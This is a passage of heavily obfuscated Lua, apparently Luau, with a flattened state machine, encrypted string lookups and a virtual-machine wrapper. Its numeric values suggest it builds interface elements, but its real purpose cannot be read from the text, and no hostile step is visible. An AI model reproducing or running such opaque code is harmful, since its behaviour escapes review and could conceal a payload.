then if g<13815895 then if g<13775552 then g=(L)[(P)[2] ]f=(a)[Y(i{1,2,{t(41028),t(41142)}},10123366975355)]C=(x)[f]Z=g(C)g=4087980 else C=(a)[Y(t(40962),22740265840957)]U=(K)[1]X=(a)[Y(i{2,1,3,{t(41817),t(41049),t(41608)}},4435643059520)]F=(U)[X]Z=(m)[C]C=(a)[Y(i{3,2,1,{t(41696),t(41201),t(41227)}},28560559778592)]x=(Z)[C]Z=(a)[Y(i{1,3,2,{t(41676),t(41460),t(41292)}},8440904642294)]X=(x)[Z]o=F==X H=o g=o and 6041347 or 6684201 end else if g<13923103 then g=(L)[(P)[1] ]g=g and 3448233 or 3354268 else U=(a)[Y(t(41532),31460481124072)]H=(m)[U]U=(a)[Y(t(41107),5164968920059)]g=(H)[U]U=(L)[(P)[1] ]H=g(U)g=true(L)[(P)[2] ]=g g=(m)[(a)[Y(i{1,3,2,{t(41318),t(41694),t(41097)}},19555388925791)] ]H={}end end else if g<14001311 then if g<13988824 then g=H and 6329794 or 6149493 else Kh=not eh ih=ih+gh q=ih<=th q=Kh and q Kh=ih>=th Kh=eh and Kh q=Kh or q Kh=6428467 g=q and Kh q=4330048 g=g or q end else J=(a)[Y(i{2,1,{t(41031),t(41854)}},15895403875921)]ah=s()q=(a)[Y(t(41163),20898184426940)]k=(m)[J]Yh=(a)[Y(i{5,7,6,2,1,4,8,3,{t(41197),t(41906),t(41050),t(41686),t(41502),t(41568),t(41480),t(41750)}},22864511690180)]p=(m)[q]q=(a)[Y(i{2,1,{t(41205),t(41527)}},22929925598145)]q=(p)[q]q=q(p,Yh)Lh=(a)[Y(i{2,1,{t(41641),t(41306)}},28395891774662)]th=(a)[Y(i{2,1,3,{t(41424),t(41428),t(41004)}},28914335728889)]Hh=(a)[Y(i{2,1,{t(40926),t(41192)}},18518747228976)]Uh=(a)[Y(t(40992),13053451550084)]p=(a)[Y(i{3,6,4,1,2,5,7,10,9,11,8,{t(40997),t(41594),t(41139),t(41523),t(41485),t(41678),t(41902),t(41771),t(41530),t(41752),t(41416)}},16268502384634)]J=k(q,p)Vh=(a)[Y(i{1,2,{t(41048),t(41825)}},10365936923428)]p=0 eh=(a)[Y(i{1,2,{t(41606),t(41445)}},14544667642565)]Yh=s()q=0 sh=(a)[Y(i{1,2,3,{t(41044),t(41436),t(41777)}},21492949069919)]Ah=(a)[Y(i{2,1,{t(41176),t(40964)}},34168624445552)];(L)[Yh]=p p=s()Ph=y(4095693,{Yh,X,p,ah});(L)[p]=q Kh=(a)[Y(i{2,1,{t(41362),t(41282)}},27169289041493)]k=B(1737141,{})oh=false q={}(L)[ah]=q ih=(m)[th]gh={eh}eh={[Kh]=Ph,[Lh]=k,[Ah]=k,[Vh]=k,[Hh]=k,[Uh]=k,[sh]=oh}th={ih(gh,eh)}q=J(e(th))g=q and 7254243 or 12869525 end end end else if g<14575480 then if g<14303227 then if g<14177409 then if g<14155806 then H=(L)[(P)[7] ]U=H()g=3405031 else g=8165994 end else if g<14284005 then w=(a)[Y(t(41419),14876606234052)]O=g M=s()f=nil(L)[M]=f f=N(15492147,{M});(L)[M]=f r=(m)[w]d=r g=r and 15081699 or 10126044 else Z=true g=Z and 8638860 or 6005244 end end else if g<14567749 then if g<14463410 then g=7218802 else g=9447822 end else g=11577216 end end else if g<14818364 then if g<14763973 then if g<14644252 then o=(K)[2]X=s()x=s()F=s()U=(K)[1];(L)[F]=(K)[3];(L)[X]=(K)[4]Z=(a)[Y(i{2,1,{t(41838),t(41543)}},26865536125356)];(L)[x]=(K)[5]H=(m)[Z]Z=(a)[Y(t(40971),5183030319003)]g=(H)[Z]Z=(a)[Y(i{1,2,{t(41307),t(41622)}},13258706108831)]H=g(Z)Z=s();(L)[Z]=H H=(a)[Y(t(41029),10078718025093)]n=(a)[Y(t(41023),14550630719703)]g=(L)[Z]f=(m)[n]M=36 n=(a)[Y(i{1,2,{t(41851),t(41232)}},14054856826417)]C=(f)[n]n=160 f=C(n,M);(g)[H]=f g=(L)[Z]D=0 H=(a)[Y(i{2,1,{t(41855),t(41418)}},33837487436503)]n=(a)[Y(t(41220),19952915180636)]f=(m)[n]n=(a)[Y(t(41858),17789692181363)]M=-80 C=(f)[n]n=0.5 f=C(n,M,D,o);(g)[H]=f n=(a)[Y(i{1,2,{t(41718),t(41405)}},17342633630026)]H=(a)[Y(i{2,1,4,3,{t(41236),t(41663),t(41631),t(41269)}},2971462550848)]g=(L)[Z]D=0 M=0 f=(m)[n]n=(a)[Y(i{2,1,{t(41152),t(41462)}},28612763598121)]C=(f)[n]n=120 f=C(n,M,D)n=(a)[Y(i{1,2,{t(41555),t(41171)}},30840499447896)];(g)[H]=f o=nil g=(L)[Z]C=U D=0 H=(a)[Y(t(41146),20361926936538)];(g)[H]=C M=0 g=(L)[Z]H=(a)[Y(i{2,1,{t(41174),t(41743)}},4771787058252)]f=(m)[n]n=(a)[Y(i{2,1,{t(41763),t(41309)}},13395562520879)]C=(f)[n]n=255 f=C(n,M,D);(g)[H]=f g=(L)[Z]H=(a)[Y(t(41301),30600314544496)]M=(a)[Y(t(41724),16986759107961)]n=(m)[M]M=(a)[Y(t(41862),17977403473369)]f=(n)[M]n=(a)[Y(i{1,3,2,{t(41730),t(41143),t(41601)}},11523901842894)]C=(f)[n];(g)[H]=C g=(L)[Z]C=14 H=(a)[Y(i{1,2,{t(41252),t(41533)}},13783333433315)];(g)[H]=C g=(L)[Z]M=10 H=(a)[Y(i{2,1,{t(41664),t(41126)}},17731369806721)]C=(L)[(P)[1] ];(g)[H]=C C=(a)[Y(i{1,2,{t(41234),t(41820)}},33499879432138)]H=(m)[C]U=nil C=(a)[Y(t(41442),30993926670514)]g=(H)[C]n=(a)[Y(t(41808),34739683826910)]C=(a)[Y(i{1,2,{t(41894),t(41136)}},6997698834282)]f=(L)[Z]H=g(C,f)f=(m)[n]n=(a)[Y(t(41571),17925779972226)]g=(a)[Y(i{1,2,3,{t(40982),t(41408),t(41612)}},8007518484634)]C=(f)[n]n=0 f=C(n,M);(H)[g]=f C=(a)[Y(i{3,4,1,2,{t(40930),t(41644),t(41364),t(41008)}},14697704029757)]H=(L)[Z]g=(H)[C]C=y(10961751,{x,(P)[2],Z,F,(P)[3],X,(P)[4]})Z=j(Z)H=(a)[Y(i{1,2,{t(41824),t(41877)}},6799140061892)]F=j(F)X=j(X)H=(g)[H]H=H(g,C)g=(m)[(a)[Y(i{1,3,2,{t(41091),t(41242),t(41662)}},11514847937104)] ]x=j(x)H={}else H=o g=F g=13987480 end else if g<14790557 then U=(a)[Y(t(41053),17036891571149)]H=(m)[U]U=(a)[Y(t(41474),11831949136713)]g=(H)[U]U=T(9351034,{(P)[1]})H=g(U)g=(m)[(a)[Y(i{2,1,3,{t(41289),t(41260),t(40937)}},30105027821764)] ]H={}else W=not r g=W and 1851775 or 13473162 end end else if g<14926621 then if g<14872257 then o=(a)[Y(t(40900),11088484422174)]F=N(5348793,{})H=(m)[o]o=H(F)g=o and 3280656 or 2848973 else ih=true g=ih and 9628185 or 13710721 end else u=(a)[Y(i{2,1,{t(41151),t(40944)}},12098887023101)]b=g h=(m)[u]g=h and 11033043 or 1257817 v=h end end end end else if g<15782521 then if g<15337735 then if g<15236408 then if g<15154477 then if g<15126117 then r=(L)[M]g=O O=d(r)d=not o g=d and 3264604 or 15378964 else F,Z=X(o,F)g=F and 954525 or 9161675 end else if g<15160406 then R=nil r=nil h=nil I=nil z=nil p=j(p)O=j(O)u=nil ah=j(ah)M=j(M)b=nil f=j(f)Yh=j(Yh)ih=true k=nil g=68195 o=ih E=nil J=nil v=j(v)w=nil d=nil C=j(C)else d=(a)[Y(i{9,1,6,8,5,2,10,4,3,7,{t(41466),t(41268),t(41141),t(40978),t(41161),t(41702),t(41149),t(41639),t(40929),t(41331)}},7919960577887)]g=(m)[(a)[Y(i{3,2,1,{t(41632),t(40916),t(41813)}},27250309462109)] ]H={d}end end else if g<15275532 then if g<15275302 then g=8922116 else H={F}Lh=true(L)[X]=Lh g=(m)[(a)[Y(i{1,2,3,{t(41070),t(41580),t(41368)}},28728593111589)] ]end else r=(a)[Y(i{3,1,2,{t(41669),t(41175),t(41071)}},5961141290398)]O=(a)[Y(t(41132),26353460530831)]O=(Z)[O]O=O(Z,r)l=g d=O g=O and 7821947 or 4526531 end end else if g<15507345 then if g<15445822 then if g<15416173 then X=j(X)F=nil M=j(M)x=j(x)X=(a)[Y(t(41439),9690461493231)]x=(a)[Y(i{2,1,{t(41753),t(41403)}},24672852875707)]F=(m)[X]X=(a)[Y(i{1,2,{t(40917),t(41279)}},11321406541979)]O=(a)[Y(i{1,2,{t(41247),t(40999)}},12988972942887)]b=(a)[Y(i{1,2,{t(41117),t(40956)}},25277294664281)]r=(a)[Y(i{1,2,{t(41068),t(41131)}},16976408361690)]M=(a)[Y(i{1,3,2,{t(41256),t(41788),t(41879)}},6545028170969)]X=(F)[X]X=X(F,x)z=190 I=0 d=(a)[Y(i{4,2,1,3,{t(41758),t(41062),t(41166),t(41386)}},6310892042816)]x=(a)[Y(t(41774),12236461758387)]F=(m)[x]x=(a)[Y(i{1,2,{t(41040),t(41090)}},2550612958263)]x=(F)[x]w=(a)[Y(i{3,1,2,{t(41628),t(41073),t(41818)}},20853883675728)]x=x(F,M)M=(a)[Y(t(41212),25255821901788)]v=(a)[Y(i{2,1,{t(40966),t(41629)}},11363481450750)]F=(m)[M]M=(a)[Y(i{2,1,{t(41257),t(41024)}},11247358598498)]M=(F)[M]M=M(F,d)d=(a)[Y(t(41890),15026306397538)]F=(m)[d]d=(a)[Y(i{1,2,{t(41032),t(41524)}},26428396420673)]d=(F)[d]h=(a)[Y(i{2,1,{t(41810),t(41067)}},12998438831593)]d=d(F,O)O=(a)[Y(t(41667),4193306690209)]F=s();(L)[F]=d d=(m)[O]O=(a)[Y(i{1,2,{t(41108),t(41912)}},33756879148779)]O=(d)[O]O=O(d,r)d=s();(L)[d]=O r=(a)[Y(i{2,1,3,{t(41517),t(41404),t(41359)}},13332452232835)]O=(X)[r]r=s();(L)[r]=O O=(L)[r]w=(O)[w]w=w(O,v)v=(m)[b]Uh=(a)[Y(i{2,1,{t(41795),t(41611)}},26139449466969)]p=30 k=40 b=(a)[Y(t(41698),8601786780702)]O=(v)[b]b=(a)[Y(i{2,1,{t(41055),t(40986)}},8165232604056)]v=O(b)th=(a)[Y(t(41842),8091116363080)]O=s()R=(a)[Y(t(40935),7804847539459)];(L)[O]=v v=(L)[O]b=(a)[Y(t(41675),3695888879648)];(v)[b]=h b=(a)[Y(i{2,3,1,{t(41427),t(41245),t(41109)}},23029984143708)]h=false v=(L)[O];(v)[b]=h b=(a)[Y(i{2,1,{t(41785),t(41782)}},29506849506579)]h=w v=(L)[O];(v)[b]=h h=(a)[Y(i{1,2,{t(41235),t(41297)}},25966197083804)]b=(m)[h]h=(a)[Y(t(41623),12597663090577)]v=(b)[h]h=(a)[Y(t(41216),4048382818305)]b=v(h)v=s()h=(a)[Y(t(41092),21770947610173)];(L)[v]=b b=(L)[v]E=(m)[R]R=(a)[Y(i{1,2,{t(41552),t(41491)}},9184631902038)]u=(E)[R]R=190 E=u(R,z)z=-210 R=(a)[Y(t(41734),14203265938150)];(b)[h]=E b=(L)[v]E=(m)[R]h=(a)[Y(i{2,1,{t(41780),t(41047)}},25355349850909)]R=(a)[Y(t(41705),34918529019180)]u=(E)[R]R=1 E=u(R,z,I,k)z=0(b)[h]=E b=(L)[v]h=(a)[Y(i{4,2,3,1,{t(41507),t(41387),t(41866),t(41477)}},21055288450836)]R=(a)[Y(i{1,2,{t(41158),t(41625)}},17625980298778)]k=0 I=0 E=(m)[R]R=(a)[Y(i{2,1,{t(41633),t(41222)}},33190534930358)]u=(E)[R]R=0 E=u(R,z,I);(b)[h]=E u=0 R=(a)[Y(t(41401),11354099658901)]b=(L)[v]h=(a)[Y(i{2,1,3,{t(41320),t(41412),t(41693)}},13752014765238)];(b)[h]=u h=(a)[Y(i{2,1,{t(41369),t(41372)}},5790798892895)]b=(L)[v]z=15 u=(L)[O];(b)[h]=u u=(a)[Y(i{2,1,{t(41495),t(41272)}},19661384560236)]h=(m)[u]u=(a)[Y(t(41768),28035694880959)]b=(h)[u]E=(L)[v]u=(a)[Y(i{1,2,{t(41674),t(41479)}},10016723225249)]J=0 h=b(u,E)b=(a)[Y(i{2,3,1,{t(41607),t(41531),t(41033)}},32818552152191)]E=(m)[R]ah=(a)[Y(t(40932),31156378651539)]I=0 R=(a)[Y(t(41853),30388334634549)]u=(E)[R]Kh=false R=0 E=u(R,z)z=(a)[Y(i{1,2,{t(41742),t(41878)}},23278136853084)];(h)[b]=E E=(a)[Y(i{1,2,{t(41776),t(41082)}},25968535467919)]u=(m)[E]E=(a)[Y(t(41303),18136380406741)]b=(u)[E]R=(L)[v]E=(a)[Y(i{2,1,{t(41715),t(41637)}},16722422494185)]u=b(E,R)b=(a)[Y(t(41455),28727968553348)]R=(m)[z]z=(a)[Y(i{1,2,{t(41614),t(41167)}},10422922255939)]E=(R)[z]z=255 R=E(z,I,k);(u)[b]=R E=2 k=-35 R=(a)[Y(i{1,2,{t(41586),t(41250)}},2703076496202)]b=(a)[Y(i{2,1,{t(41547),t(41872)}},34296935386049)];(u)[b]=E E=(m)[R]R=(a)[Y(t(41001),3695946766382)]b=(E)[R]R=(a)[Y(i{1,2,{t(41880),t(41074)}},21337333616217)]I=(a)[Y(t(41380),13559673777321)]E=b(R)b=(a)[Y(t(41265),19497679204533)]z=(m)[I]I=(a)[Y(t(40923),19946185456376)]R=(z)[I]I=1 z=R(I,k,J,p);(E)[b]=z I=(a)[Y(t(41063),35174497229177)]k=10 b=(a)[Y(i{2,1,{t(41832),t(41150)}},26130225566124)]p=5 Vh=true z=(m)[I]Yh=18 J=0 I=(a)[Y(t(40950),3350118866319)]R=(z)[I]I=0 z=R(I,k,J,p);(E)[b]=z b=(a)[Y(i{5,4,2,3,1,{t(41779),t(41261),t(41711),t(41186),t(41584)}},30776385750283)]R=1 k=(a)[Y(t(41845),9267947624083)]J=0(E)[b]=R b=(a)[Y(t(41828),11431666851955)]R=(a)[Y(i{1,2,{t(41801),t(40965)}},3130806522865)];(E)[b]=R b=(a)[Y(i{1,3,2,{t(41478),t(40941),t(41626)}},8810629319114)]I=(m)[k]k=(a)[Y(i{2,3,1,{t(41783),t(40911),t(41433)}},32809861502189)]z=(I)[k]I=(a)[Y(t(41355),12873953767599)]R=(z)[I];(E)[b]=R I=(a)[Y(i{1,2,{t(40972),t(40915)}},27101432031558)]b=(a)[Y(i{1,2,{t(41582),t(40899)}},33895782175649)]z=(m)[I]I=(a)[Y(i{2,1,{t(41273),t(41794)}},18573560846745)]R=(z)[I]k=0 I=255 p=0 z=R(I,k,J);(E)[b]=z b=(a)[Y(t(41891),25103338129621)]k=(a)[Y(t(40928),14194902010179)]I=(m)[k]k=(a)[Y(t(41721),3380308017951)]z=(I)[k]I=(a)[Y(i{3,2,1,{t(41767),t(41326),t(41363)}},28180593932165)]R=(z)[I];(E)[b]=R R=18 z=(a)[Y(i{2,1,{t(41761),t(41337)}},582772130356)]b=(a)[Y(i{2,1,{t(41449),t(41325)}},3913631969628)];(E)[b]=R b=(a)[Y(i{2,1,{t(41127),t(41790)}},382894001931)]R=(L)[v];(E)[b]=R R=(m)[z]z=(a)[Y(t(41522),13348231452890)]b=(R)[z]z=(a)[Y(i{2,1,{t(41604),t(41560)}},861292752871)]k=(a)[Y(t(41489),3067645985129)]R=b(z)I=(m)[k]J=-35 b=(a)[Y(t(40939),4132231946548)]gh=(a)[Y(t(41556),5574786351012)]k=(a)[Y(t(41590),9747150159354)]z=(I)[k]k=1 I=z(k,J,p,Yh);(R)[b]=I k=(a)[Y(t(41470),18670146246056)]b=(a)[Y(i{2,1,{t(41867),t(41706)}},8103474256725)]I=(m)[k]k=(a)[Y(t(40994),21331200127097)]z=(I)[k]J=10 k=0 Yh=32 p=0 I=z(k,J,p,Yh);(R)[b]=I z=1 b=(a)[Y(i{4,2,1,5,3,{t(41381),t(41275),t(41259),t(41746),t(41096)}},34694231841013)];(R)[b]=z z=(a)[Y(i{2,1,4,3,{t(41540),t(41748),t(41665),t(41762)}},418408776332)]b=(a)[Y(t(41122),25646162361409)];(R)[b]=z b=(a)[Y(i{1,2,3,{t(41592),t(41826),t(41018)}},24897452087378)]J=(a)[Y(t(40947),7857715501750)]k=(m)[J]p=80 J=(a)[Y(i{3,1,2,{t(40890),t(41720),t(41501)}},15188781534816)]I=(k)[J]k=(a)[Y(t(41319),18793210325003)]J=80 z=(I)[k]k=(a)[Y(i{1,2,{t(41576),t(41883)}},19011630934013)];(R)[b]=z I=(m)[k]b=(a)[Y(i{1,2,{t(41039),t(40918)}},22854151993696)]k=(a)[Y(i{2,1,{t(41800),t(41110)}},19692852138331)]z=(I)[k]k=170 I=z(k,J,p);(R)[b]=I J=(a)[Y(t(41125),23046520026550)]b=(a)[Y(t(41298),16845046802255)]k=(m)[J]J=(a)[Y(t(41506),13675089245332)]I=(k)[J]k=(a)[Y(i{2,1,{t(41529),t(41652)}},18843148970377)]z=(I)[k];(R)[b]=z k=(a)[Y(i{2,1,{t(41857),t(41655)}},12284252588399)]z=11 b=(a)[Y(i{2,1,{t(41683),t(41630)}},26436955585819)];(R)[b]=z b=(a)[Y(i{2,1,{t(41371),t(41551)}},17492661187454)]z=(L)[v];(R)[b]=z I=(m)[k]k=(a)[Y(t(40973),18404593497229)]b=(a)[Y(i{2,1,{t(41538),t(41548)}},30298471282683)]z=(I)[k]k=1 Yh=(m)[ah]ah=(a)[Y(i{2,1,3,{t(41649),t(41616),t(41613)}},28555567768874)]p=(Yh)[ah]Yh=(a)[Y(t(41505),26230999681624)]J=(p)[Yh]ah=(m)[th]th=(a)[Y(i{3,2,1,{t(41645),t(40938),t(41876)}},21604170933987)]Yh=(ah)[th]ah=(a)[Y(t(41617),29313988846628)]p=(Yh)[ah]ah=true Yh=-1 b=(x)[b]I=z(k,J,p,Yh,ah)k=(a)[Y(i{1,2,4,3,{t(41793),t(41417),t(41841),t(41263)}},17962540536119)]p=30 J=0.2 eh=60 z={[k]=J}b=b(x,E,I,z)J=(a)[Y(t(41714),14729663086103)]z=(a)[Y(t(41021),1298527027545)]z=(b)[z]I=(a)[Y(i{1,2,{t(41095),t(41376)}},19266281608111)]z=z(b)z=(m)[I]I=(a)[Y(t(41764),4252513645065)]b=(z)[I]I=(a)[Y(i{1,2,{t(41566),t(41437)}},13365049113065)]z=b(I)b=(a)[Y(t(41737),11596831048853)]ah=6 k=(m)[J]Yh=0 J=(a)[Y(i{2,1,{t(41816),t(41434)}},12192812798903)]I=(k)[J]J=30 k=I(J,p);(z)[b]=k b=(a)[Y(i{1,2,{t(41514),t(41157)}},17386436038968)]p=-35 J=(a)[Y(t(41689),14354701598889)]k=(m)[J]J=(a)[Y(t(41059),3926530251625)]I=(k)[J]J=1 k=I(J,p,Yh,ah)Yh=0 J=(a)[Y(i{2,1,{t(41648),t(41488)}},25244629953367)];(z)[b]=k I=1 Ah=false b=(a)[Y(i{5,4,3,2,1,{t(41385),t(40898),t(41591),t(41036),t(41348)}},25443593988689)];(z)[b]=I b=(a)[Y(t(41013),12968864066504)]I=(a)[Y(t(41026),23186805593776)];(z)[b]=I k=(m)[J]b=(a)[Y(i{1,2,{t(41219),t(41079)}},7142569708449)]J=(a)[Y(i{1,2,{t(41294),t(41045)}},7517198337582)]I=(k)[J]p=0 J=255 k=I(J,p,Yh);(z)[b]=k p=(a)[Y(t(41365),29952486413043)]J=(m)[p]b=(a)[Y(t(41661),22090685126756)]p=(a)[Y(t(41577),24940873079876)]k=(J)[p]J=(a)[Y(i{1,2,3,{t(41317),t(41349),t(41631)}},10280768903204)]I=(k)[J];(z)[b]=I b=(a)[Y(i{1,2,{t(41839),t(41471)}},19138963989802)]I=18(z)[b]=I b=(a)[Y(i{2,1,{t(41875),t(41570)}},418202793921)]k=y(2120874,{O})I=(L)[v];(z)[b]=I I=(a)[Y(i{1,2,3,4,{t(41441),t(41578),t(41258),t(41287)}},17734557234301)]b=(z)[I]I=(a)[Y(i{1,2,{t(41634),t(41511)}},9422423620044)]I=(b)[I]I=I(b,k)k=c(5376898,{})I=s()b=false(L)[I]=b b=s();(L)[b]=k k=s()J=S(9121876,{d,b})p=S(14777122,{k});(L)[k]=J J=s();(L)[J]=p p=s()Yh=B(3918211,{J,r});(L)[p]=Yh ah=G(2585390,{I,p})Yh=s();(L)[Yh]=ah ah=Q(14581342,{v,Yh,I,p})th=ah(gh,eh,Kh,Ah,Vh)Vh=false eh=100 gh=(a)[Y(i{3,2,1,{t(41308),t(41283),t(41426)}},27848696525122)]Kh=true Ah=false th=ah(gh,eh,Kh,Ah,Vh)gh=(a)[Y(i{2,3,1,{t(41613),t(41796),t(41840)}},5143437984554)]Ah=true eh=140 Kh=false Vh=false th=ah(gh,eh,Kh,Ah,Vh)gh=s()th=false eh=s();(L)[gh]=th Kh=s()th=nil(L)[eh]=th th=nil Vh=(a)[Y(i{2,1,{t(40922),t(41351)}},22898396356398)];(L)[Kh]=th Ah=(L)[v]th=(Ah)[Vh]Vh=B(13789898,{gh,eh,v,Kh})Ah=(a)[Y(i{2,1,{t(41738),t(41440)}},5717676463251)]Ah=(th)[Ah]Ah=Ah(th,Vh)Ah=(L)[v]Vh=(a)[Y(i{2,1,{t(41210),t(41881)}},9436871528060)]th=(Ah)[Vh]Vh=y(68966,{gh})Ah=(a)[Y(i{2,1,{t(41559),t(41398)}},1343785020276)]Ah=(th)[Ah]Ah=Ah(th,Vh)Vh=G(16441018,{gh,eh,v,Kh})Ah=(a)[Y(i{3,2,1,{t(41534),t(41822),t(40949)}},25993070623909)]th=(M)[Ah]Ah=(a)[Y(i{2,1,{t(41172),t(41060)}},11414125253778)]Ah=(th)[Ah]Ah=Ah(th,Vh)Ah=g Hh=(L)[r]Vh=(Hh)[Uh]th=Vh g=Vh and 7168360 or 9129023 else H={}g=true(L)[(P)[1] ]=g g=(m)[(a)[Y(i{3,1,2,{t(41539),t(41305),t(41518)}},32434742590338)] ]end else if g<15474243 then f=1 Z={}C=s();(L)[C]=Z Z=(L)[C]n=(L)[C];(Z)[f]=n f=(a)[Y(t(41119),17331064559533)]n=T(13979893,{C,X})Z=(m)[f]f=Z(n)n=N(16088895,{X})f=(a)[Y(t(41508),24920524445981)]Z=(m)[f]f=Z(n)Z=(L)[X]g=Z and 4973230 or 12944132 else g=(L)[(P)[1] ]H={g}g=(m)[(a)[Y(i{2,1,3,{t(41130),t(41345),t(41565)}},31592838892541)] ]end end else if g<15737018 then if g<15614376 then H=(a)[Y(t(41453),10099797195484)]U=(a)[Y(t(40951),4997775011988)]g=(m)[H]H=g(U)H={}g=(m)[(a)[Y(i{1,3,2,{t(40924),t(41754),t(41374)}},19368719868323)] ]else g=3601676 end else g=false(L)[(P)[1] ]=g g=2819123 end end end else if g<16260699 then if g<16041139 then if g<15850574 then if g<15803764 then U=(a)[Y(i{2,1,{t(41162),t(41144)}},1865385372226)]H=(m)[U]U=(a)[Y(i{2,1,3,{t(41846),t(40902),t(41180)}},34313426740883)]g=(H)[U]U=(L)[(P)[1] ]H=g(U)g=true(L)[(P)[2] ]=g H={}g=(m)[(a)[Y(i{3,1,2,{t(40919),t(41007),t(41115)}},11359536129095)] ]else Ph=true(L)[X]=Ph g=4269644 Lh=nil end else if g<15994515 then Z,n=C(x,Z)g=Z and 9154427 or 2449257 else g=0 o=g H=(a)[Y(t(41473),3277999133916)]g=(m)[H]U=(K)[1]x={g(U)}F=(x)[2]H=(x)[1]g=8782025 X=(x)[3]x=H end end else if g<16230642 then if g<16099910 then U=(a)[Y(t(41600),21741233151746)]H=(m)[U]U=(a)[Y(t(40987),8115507483884)]g=(H)[U]U={}H=g(U)g=true H={}(L)[(P)[1] ]=g g=(m)[(a)[Y(i{2,1,3,{t(41610),t(40896),t(41203)}},1127708630686)] ]else mh=1 J+=mh gh=J>z g=gh and 542221 or 5226951 end else g=8165994 H=true(L)[(P)[2] ]=H end end else if g<16444005 then if g<16394794 then if g<16329018 then g=13989520 q=nil Kh=nil else H=(a)[Y(i{2,1,{t(41422),t(41393)}},26230245417507)]g=(m)[H]x=(a)[Y(i{2,3,1,{t(41171),t(40968),t(41204)}},9714560156423)]x=(U)[x]X={x(U)}x={g(e(X))}o=(x)[2]F=(x)[3]H=(x)[1]g=15142384 X=H end else if g<16412226 then g=7261481 b=(a)[Y(t(41646),6195121269840)]v=(a)[Y(t(41083),11141354520754)]v=(Z)[v]v=v(Z,b)W=v else U=(K)[1]o=(L)[(P)[1] ]g=o and 4698375 or 13987480 H=o end end else if g<16494789 then if g<16447575 then H=(L)[(P)[6] ]g=H and 14088716 or 3405031 else g=C and 5385898 or 2283378 end else H={}g=(m)[(a)[Y(i{3,1,2,{t(41375),t(41224),t(41732)}},22189279966541)] ]end end end end end end end end g=#A return e(H)end,function(Y,a,...)local i=F(a)local m=function(m,...)return g(Y,{m},a,i)end return m end,function(Y,a,...)local i=F(a)local m=function(...)return g(Y,{},a,i)end return m end,function(m,...)for Y=1,#m,1 do(U)[(m)[Y] ]=(U)[(m)[Y] ]+1 end if K then local g=K(true)local e=A(g);(e)[(a)[Y(i{2,1,{t(41246),t(41087)}},3200115311689)] ],(e)[(a)[Y(t(41088),29289825431347)] ],(e)[(a)[Y(t(41535),5252429318118)] ]=m,X,function(...)return 3580762 end return g else return P({},{[(a)[Y(t(41034),26046772383103)] ]=X,[(a)[Y(i{1,2,{t(41051),t(41564)}},1345106071152)] ]=m,[(a)[Y(t(41450),8088008893059)] ]=function(...)return 3580762 end})end end,function(Y,a,...)local i=F(a)local m=function(m,t,e,K,P,A,...)return g(Y,{m,t,e,K,P,A},a,i)end return m end return(x(13473650,{}))(e(H))end)(getfenv and getfenv()or _ENV,unpack or(table)[(a)[Y(i{1,2,{t(41708),t(41271)}},8172106555808)] ],newproxy,setmetatable,getmetatable,select,{...})end)(...)
